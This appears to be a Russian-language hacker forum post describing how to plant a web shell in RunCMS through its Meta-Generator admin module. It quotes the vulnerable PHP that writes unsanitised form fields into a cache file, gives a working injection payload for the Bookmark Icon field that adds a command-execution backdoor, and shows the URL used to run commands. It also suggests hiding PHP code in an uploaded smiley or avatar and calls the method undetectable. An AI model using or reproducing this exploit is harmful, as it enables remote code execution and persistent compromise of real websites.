Заливка шелла в RunCMS
через
Meta-Generator
Уязвимый кусок кода:
Код:
.......
$content .= "\$meta['follow'] = \"".$_POST["Xfollow"]."\";\n";
$content .= "\$meta['pragma'] = \"".$_POST["Xpragma"]."\";\n";
$content .= "\$meta['icon'] = \"".$_POST["Xicon"]."\";\n";
.......
write_file("meta", $content, "w");
Идем в:
Код:
http://localhost/runc/modules/system/admin.php?fct=meta-generator
поле Bookmark Icon имеет вид:
правим так:
Код:
../../favicon.ico";echo `$_REQUEST[c]`;#
теперь файл с этой опцией (\modules\system\cache\meta.php) выглядит так:
Код:
.........
$meta['rating'] = "general";
$meta['p3p'] = "";
$meta['index'] = "index";
$meta['follow'] = "follow";
$meta['pragma'] = "";
$meta['icon'] = "../../favicon.ico";echo `$_REQUEST[c]`;#";
.........
Т.е. классический php-injection, как видим теперь все зависит от нашей фантазии
используем так:
Код:
http://localhost/runc/modules/system/admin.php?fct=meta-generator&c=dir
Имхо, метод вообще безпалевный (когда юзать будем POST)
Так же, как вариант, можно инклудить смайл/аватарку с добавленным в нее php-кодом (после заливки лежать она будет тут ../../images/smilies/smile.gif )
ZAMUT (c)